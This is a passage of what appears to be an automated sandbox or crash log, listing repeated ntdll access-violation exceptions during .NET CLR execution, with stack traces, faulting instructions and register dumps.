mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b f8 0b da 89
exception.symbol: RtlInitUnicodeString+0xec RtlMultiByteToUnicodeN-0x251 ntdll+0x2e2f4
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 189172
exception.address: 0x76f3e2f4
registers.esp: 8681184
registers.edi: 63
registers.eax: 83308560
registers.ebp: 8681316
registers.edx: 9074608
registers.ebx: 45
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
RtlDeleteBoundaryDescriptor+0x3f RtlAnsiStringToUnicodeString-0x9 ntdll+0x2e6ac @ 0x76f3e6ac
_wcsnicmp+0x133 RtlInitAnsiStringEx-0x2d ntdll+0x2f76e @ 0x76f3f76e
EtwEventRegister+0x116 EtwRegisterTraceGuidsW-0x73 ntdll+0x3f7d0 @ 0x76f4f7d0
LdrGetProcedureAddressEx+0x11f wcsstr-0x99d ntdll+0x302ea @ 0x76f402ea
LdrGetProcedureAddress+0x18 LdrGetProcedureAddressEx-0x9 ntdll+0x301c2 @ 0x76f401c2
New_ntdll_LdrGetProcedureAddress@16+0x59 New_ntdll_LdrLoadDll@16-0xfb @ 0x733cd359
GetProcAddress+0x44 GetVersion-0x38 kernelbase+0x111c4 @ 0x759811c4
CreateAssemblyNameObject+0xe597 GetMetaDataInternalInterface-0x29ed8 clr+0x3ba30 @ 0x724cba30
CoUninitializeEE+0xa200 CreateAssemblyNameObject-0x3a55 clr+0x29a44 @ 0x724b9a44
CoUninitializeEE+0xa149 CreateAssemblyNameObject-0x3b0c clr+0x2998d @ 0x724b998d
CoUninitializeEE+0xa055 CreateAssemblyNameObject-0x3c00 clr+0x29899 @ 0x724b9899
CoUninitializeEE+0x9fee CreateAssemblyNameObject-0x3c67 clr+0x29832 @ 0x724b9832
DllRegisterServerInternal+0x98c9 CoUninitializeEE-0x3b6f clr+0x1bcd5 @ 0x724abcd5
DllUnregisterServerInternal-0x760b clr+0x2ae9 @ 0x72492ae9
mscorlib+0x34f024 @ 0x7173f024
mscorlib+0x2d5f6a @ 0x716c5f6a
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetClassObjectInternal+0x3563c CorDllMainForThunk-0x56ebf clr+0xfa6b5 @ 0x7258a6b5
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b f8 0b da 89
exception.symbol: RtlInitUnicodeString+0xec RtlMultiByteToUnicodeN-0x251 ntdll+0x2e2f4
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 189172
exception.address: 0x76f3e2f4
registers.esp: 8682248
registers.edi: 63
registers.eax: 83308560
registers.ebp: 8682380
registers.edx: 9074608
registers.ebx: 53
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
RtlDeleteBoundaryDescriptor+0x3f RtlAnsiStringToUnicodeString-0x9 ntdll+0x2e6ac @ 0x76f3e6ac
_wcsnicmp+0x133 RtlInitAnsiStringEx-0x2d ntdll+0x2f76e @ 0x76f3f76e
EtwEventRegister+0x116 EtwRegisterTraceGuidsW-0x73 ntdll+0x3f7d0 @ 0x76f4f7d0
LdrGetProcedureAddressEx+0x11f wcsstr-0x99d ntdll+0x302ea @ 0x76f402ea
LdrGetProcedureAddress+0x18 LdrGetProcedureAddressEx-0x9 ntdll+0x301c2 @ 0x76f401c2
New_ntdll_LdrGetProcedureAddress@16+0x59 New_ntdll_LdrLoadDll@16-0xfb @ 0x733cd359
GetProcAddress+0x44 GetVersion-0x38 kernelbase+0x111c4 @ 0x759811c4
CreateAssemblyNameObject+0xe597 GetMetaDataInternalInterface-0x29ed8 clr+0x3ba30 @ 0x724cba30
CoUninitializeEE+0xa200 CreateAssemblyNameObject-0x3a55 clr+0x29a44 @ 0x724b9a44
CoUninitializeEE+0xa149 CreateAssemblyNameObject-0x3b0c clr+0x2998d @ 0x724b998d
CoUninitializeEE+0xa055 CreateAssemblyNameObject-0x3c00 clr+0x29899 @ 0x724b9899
CoUninitializeEE+0x9fee CreateAssemblyNameObject-0x3c67 clr+0x29832 @ 0x724b9832
DllRegisterServerInternal+0x98c9 CoUninitializeEE-0x3b6f clr+0x1bcd5 @ 0x724abcd5
DllUnregisterServerInternal-0x760b clr+0x2ae9 @ 0x72492ae9
mscorlib+0x34f024 @ 0x7173f024
mscorlib+0x2d5f6a @ 0x716c5f6a
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetClassObjectInternal+0x3563c CorDllMainForThunk-0x56ebf clr+0xfa6b5 @ 0x7258a6b5
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b d8 0b fa 89
exception.symbol: LdrUnlockLoaderLock+0x2cc RtlInitUnicodeStringEx-0xe6b ntdll+0x36f08
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 225032
exception.address: 0x76f46f08
registers.esp: 8682248
registers.edi: 53
registers.eax: 83308560
registers.ebp: 8682380
registers.edx: 4294901824
registers.ebx: 63
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
DllUnregisterServerInternal-0x7fe0 clr+0x2114 @ 0x72492114
DllUnregisterServerInternal-0x7fa5 clr+0x214f @ 0x7249214f
CreateAssemblyNameObject+0x2a1ab GetMetaDataInternalInterface-0xe2c4 clr+0x57644 @ 0x724e7644
SetMSIHandleForLogging+0x1133 CreateAssemblyConfigCookie-0x7d95 clr+0x395a8e @ 0x72825a8e
CreateAssemblyEnum+0x450 CreateInstallReferenceEnum-0x880 clr+0x38f735 @ 0x7281f735
CreateAssemblyEnum+0x36b CreateInstallReferenceEnum-0x965 clr+0x38f650 @ 0x7281f650
CreateAssemblyEnum+0x188 CreateInstallReferenceEnum-0xb48 clr+0x38f46d @ 0x7281f46d
mscorlib+0x3916f5 @ 0x717816f5
mscorlib+0x34f024 @ 0x7173f024
mscorlib+0x2d5f6a @ 0x716c5f6a
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetClassObjectInternal+0x3563c CorDllMainForThunk-0x56ebf clr+0xfa6b5 @ 0x7258a6b5
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b d8 0b fa 89
exception.symbol: LdrUnlockLoaderLock+0x2cc RtlInitUnicodeStringEx-0xe6b ntdll+0x36f08
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 225032
exception.address: 0x76f46f08
registers.esp: 8683788
registers.edi: 53
registers.eax: 83308560
registers.ebp: 8683920
registers.edx: 4294901824
registers.ebx: 63
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
DllUnregisterServerInternal-0x7fe0 clr+0x2114 @ 0x72492114
DllUnregisterServerInternal-0x7fa5 clr+0x214f @ 0x7249214f
CreateAssemblyNameObject+0x263 GetMetaDataInternalInterface-0x3820c clr+0x2d6fc @ 0x724bd6fc
CreateAssemblyNameObject+0x1af GetMetaDataInternalInterface-0x382c0 clr+0x2d648 @ 0x724bd648
CreateAssemblyNameObject+0x27106 GetMetaDataInternalInterface-0x11369 clr+0x5459f @ 0x724e459f
DllGetClassObjectInternal+0x355f9 CorDllMainForThunk-0x56f02 clr+0xfa672 @ 0x7258a672
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetClassObjectInternal+0x3563c CorDllMainForThunk-0x56ebf clr+0xfa6b5 @ 0x7258a6b5
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b d8 0b fa 89
exception.symbol: LdrUnlockLoaderLock+0x2cc RtlInitUnicodeStringEx-0xe6b ntdll+0x36f08
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 225032
exception.address: 0x76f46f08
registers.esp: 8682536
registers.edi: 53
registers.eax: 83308560
registers.ebp: 8682668
registers.edx: 4294901824
registers.ebx: 63
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
DllGetClassObjectInternal+0x3995f CorDllMainForThunk-0x52b9c clr+0xfe9d8 @ 0x7258e9d8
DllGetClassObjectInternal+0x3cb36 CorDllMainForThunk-0x4f9c5 clr+0x101baf @ 0x72591baf
DllGetClassObjectInternal+0x3cb02 CorDllMainForThunk-0x4f9f9 clr+0x101b7b @ 0x72591b7b
DllGetClassObjectInternal+0x3d036 CorDllMainForThunk-0x4f4c5 clr+0x1020af @ 0x725920af
DllGetClassObjectInternal+0x3f696 CorDllMainForThunk-0x4ce65 clr+0x10470f @ 0x7259470f
DllGetClassObjectInternal+0x3f6f2 CorDllMainForThunk-0x4ce09 clr+0x10476b @ 0x7259476b
DllGetClassObjectInternal+0x3d5e6 CorDllMainForThunk-0x4ef15 clr+0x10265f @ 0x7259265f
DllGetClassObjectInternal+0x3cf04 CorDllMainForThunk-0x4f5f7 clr+0x101f7d @ 0x72591f7d
